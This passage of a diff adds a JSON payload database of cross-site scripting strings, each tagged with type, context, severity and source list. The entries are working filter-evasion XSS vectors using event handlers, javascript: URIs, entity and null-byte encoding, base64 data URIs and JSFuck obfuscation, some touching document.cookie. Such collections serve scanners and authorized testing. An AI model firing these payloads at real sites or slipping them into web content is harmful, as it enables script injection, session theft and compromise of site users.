TYPE=\"text/javascript\">alert('XSS');</STYLE>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<XSS STYLE=\"xss:expression(alert('XSS'))\">", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<IFRAME SRC=# onmouseover=\"alert(document.cookie)\"></IFRAME>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "critical", + "source": "xss_alert" + } + }, + { + "payload": "<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<TABLE BACKGROUND=\"javascript:alert('XSS')\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<DIV STYLE=\"background-image: url(&#1;javascript:alert('XSS'))\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<DIV STYLE=\"width: expression(alert('XSS'));\">", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "style", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<BASE HREF=\"javascript:alert('XSS');//\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<? echo('<SCR)';echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<iframe %00 src=\"&Tab;javascript:prompt(1)&Tab;\"%00>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img src=`%00`&NewLine; onerror=alert(1)&NewLine;", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<iframe/src=\"data:text/html,<svg &#111;&#110;load=alert(1)>\">", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<meta content=\"&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)\" http-equiv=\"refresh\"/>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "</script><img/*%00/src=\"worksinchrome&colon;prompt&#x28;1&#x29;\"/%00*/onerror='eval(src)'>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<form><iframe &#09;&#10;&#11; src=\"javascript&#58;alert(1)\"&#11;&#10;&#09;;>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a&#32;href&#61;&#91;&#00;&#93;\"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;\">XYZ</a", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img/src=@&#32;&#13; onerror = prompt('&#49;')", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "&#00;</form><input type&#61;\"date\" onfocus=\"alert(1)\">", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"javascript:void(0)\" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<iframe/%00/ src=javaSCRIPT&colon;alert(1)", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a/href=\"javascript:&#13; javascript:prompt(1)\"><input type=\"X\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "</plaintext\\></|\\><plaintext/onmouseover=prompt(1)", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<var onmouseover=\"prompt(1)\">On Mouse Over</var>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<input type=\"text\" value=`` <div/onmouseover='alert(1)'>X</div>", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<meta http-equiv=\"refresh\" content=\"0;javascript&colon;alert(1)\"/>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script itworksinallbrowsers>/*<script* */alert(1)</script", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img src ?itworksonchrome?\\/onerror = alert(1)", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<div style=\"position:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(1)\" onclick=\"alert(1)\">x</button>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "style", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script>alert('XSS')</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "<scr<script>ipt>alert('XSS')</scr<script>ipt>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "\"><script>alert('XSS')</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "\"><script>alert(String.fromCharCode(88,83,83))</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "<img src=x onerror=alert('XSS');>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "<img src=x onerror=alert(String.fromCharCode(88,83,83));>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "<img src=x:alert(alt) onerror=eval(src) alt=xss>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "\"><img src=x onerror=alert('XSS');>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "\"><img src=x onerror=alert(String.fromCharCode(88,83,83));>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "<svg\fonload=alert(1)>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "event_attribute", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "<svg/onload=alert('XSS')>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "event_attribute", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "<svg/onload=alert(String.fromCharCode(88,83,83))>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "event_attribute", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "<svg id=alert(1) onload=eval(id)>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "event_attribute", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "\"><svg/onload=alert(String.fromCharCode(88,83,83))>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "event_attribute", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "\"><svg/onload=alert(/XSS/)", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "event_attribute", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "<body onload=alert(/XSS/.source)>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "event_attribute", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "<input autofocus onfocus=alert(1)>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "<select autofocus onfocus=alert(1)>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "<textarea autofocus onfocus=alert(1)>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "<video/poster/onerror=alert(1)>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "event_attribute", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "<video><source onerror=\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "<video src=_ onloadstart=\"alert(1)\">", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "attribute", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "<details/open/ontoggle=\"alert`1`\">", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">", + "category": "xss", + "metadata": { + "type": "data_uri", + "context": "event_attribute", + "severity": "medium", + "source": "IntrudersXSS" + } + }, + { + "payload": "<meta/content=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg==\"http-equiv=refresh>", + "category": "xss", + "metadata": { + "type": "data_uri", + "context": "event_attribute", + "severity": "medium", + "source": "IntrudersXSS" + } + }, + { + "payload": "data:text/html,<script>alert(0)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "<object onafterscriptexecute=confirm(0)>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "<object onbeforescriptexecute=confirm(0)>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "<script>window['alert'](document['domain'])<script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "<img src='1' onerror/=alert(0) />", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "<script>window['alert'](0)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "<script>parent['alert'](1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "<script>self['alert'](2)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "<script>top['alert'](3)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "<x oncut=alert(1)>cut this!", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "<script>\\u0061\\u006C\\u0065\\u0072\\u0074(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "medium", + "source": "IntrudersXSS" + } + }, + { + "payload": "<img src=\"1\" onerror=\"&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;\" />", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "medium", + "source": "IntrudersXSS" + } + }, + { + "payload": "<iframe src=\"javascript:%61%6c%65%72%74%28%31%29\"></iframe>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "medium", + "source": "IntrudersXSS" + } + }, + { + "payload": "<script>$=~[];$={___:++$,$$$$:(![]+\"\")[$],__$:++$,$_$_:(![]+\"\")[$],_$_:++$,$_$$:({}+\"\")[$],$$_$:($[$]+\"\")[$],_$$:++$,$$$_:(!\"\"+\"\")[$],$__:++$,$_$:++$,$$__:({}+\"\")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+\"\")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+\"\")[$.__$])+((!$)+\"\")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!\"\"+\"\")[$.__$])+($._=(!\"\"+\"\")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!\"\"+\"\")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+\"\\\"\"+$.$_$_+(![]+\"\")[$._$_]+$.$$$_+\"\\\\\"+$.__$+$.$$_+$._$_+$.__+\"(\"+$.___+\")\"+\"\\\"\")())();</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "medium", + "source": "IntrudersXSS" + } + }, + { + "payload": "<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "medium", + "source": "IntrudersXSS" + } + }, + { + "payload": "<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "medium", + "source": "IntrudersXSS" + } + }, + { + "payload": "<script>$=1,alert($)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "<script ~~~>confirm(1)</script ~~~>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "<script>$=1,\\u0061lert($)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "medium", + "source": "IntrudersXSS" + } + }, + { + "payload": "<</script/script><script>eval('\\\\u'+'0061'+'lert(1)')//</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "medium", + "source": "IntrudersXSS" + } + }, + { + "payload": "<</script/script><script ~~~>\\u0061lert(1)</script ~~~>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "medium", + "source": "IntrudersXSS" + } + }, + { + "payload": "</style></scRipt><scRipt>alert(1)</scRipt>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "<img/id=\"alert&lpar;&#x27;XSS&#x27;&#x29;\\\"/alt=\\\"/\\\"src=\\\"/\\\"onerror=eval(id&#x29;>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "<svg><x><script>alert&#40;&#39;1&#39;&#41</x>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "<iframe src=\"\"/srcdoc='&lt;svg onload&equals;alert&lpar;1&rpar;&gt;'>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "high", + "source": "IntrudersXSS" + } + }, + { + "payload": "javascript:alert(1)//INJECTX", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_payloads_quick" + } + }, + { + "payload": "<svg/onload=alert(1)>//INJECTX", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "event_attribute", + "severity": "high", + "source": "xss_payloads_quick" + } + }, + { + "payload": "<img onload=alert(1)>//INJECTX", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "event_attribute", + "severity": "high", + "source": "xss_payloads_quick" + } + }, + { + "payload": "<img src=x onerror=prompt(1)>//INJECTX", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_payloads_quick" + } + }, + { + "payload": "<a href=\"javascript:alert(1)\" onmouseover=alert(1)>INJECTX HOVER</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_payloads_quick" + } + }, + { + "payload": "onmouseover=\"document.cookie=true;\">//INJECTX", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "critical", + "source": "xss_payloads_quick" + } + }, + { + "payload": "alert(1)>//INJECTX", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "xss_payloads_quick" + } + }, + { + "payload": "<h1>INJECTX</h1>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "xss_payloads_quick" + } + }, + { + "payload": "<img src=x onload=prompt(1) onerror=alert(1) onmouseover=prompt(1)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_payloads_quick" + } + }, + { + "payload": "<svg><script>/<@/>alert(1)</script>//INJECTX", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_payloads_quick" + } + }, + { + "payload": "<svg/onload=alert(/INJECTX/)>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "event_attribute", + "severity": "high", + "source": "xss_payloads_quick" + } + }, + { + "payload": "<iframe/onload=alert(/INJECTX/)>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "event_attribute", + "severity": "high", + "source": "xss_payloads_quick" + } + }, + { + "payload": "<svg/onload=alert`INJECTX`>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "event_attribute", + "severity": "high", + "source": "xss_payloads_quick" + } + }, + { + "payload": "<svg/onload=alert(`INJECTX`)>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "event_attribute", + "severity": "high", + "source": "xss_payloads_quick" + } + }, + { + "payload": "}alert(/INJECTX/);{//", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "xss_payloads_quick" + } + }, + { + "payload": "<h1/onclick=alert(1)>a//INJECTX", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "event_attribute", + "severity": "high", + "source": "xss_payloads_quick" + } + }, + { + "payload": "<p/onclick=alert(/INJECTX/)>a", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "event_attribute", + "severity": "high", + "source": "xss_payloads_quick" + } + }, + { + "payload": "<video><source onerror=\"javascript:alert(1)\">//INJECTX", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "xss_payloads_quick" + } + }, + { + "payload": "<video onerror=\"javascript:alert(1)\"><source>//INJECTX", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "xss_payloads_quick" + } + }, + { + "payload": "<audio onerror=\"javascript:alert(1)\"><source>//INJECTX", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "xss_payloads_quick" + } + }, + { + "payload": "<input autofocus onfocus=alert(1)>//INJECTX", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "xss_payloads_quick" + } + }, + { + "payload": "<select autofocus onfocus=alert(1)>//INJECTX", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "xss_payloads_quick" + } + }, + { + "payload": "<textarea autofocus onfocus=alert(1)>//INJECTX", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "xss_payloads_quick" + } + }, + { + "payload": "<keygen autofocus onfocus=alert(1)>//INJECTX", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "xss_payloads_quick" + } + }, + { + "payload": "<button form=test onformchange=alert(1)>//INJECTX", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": 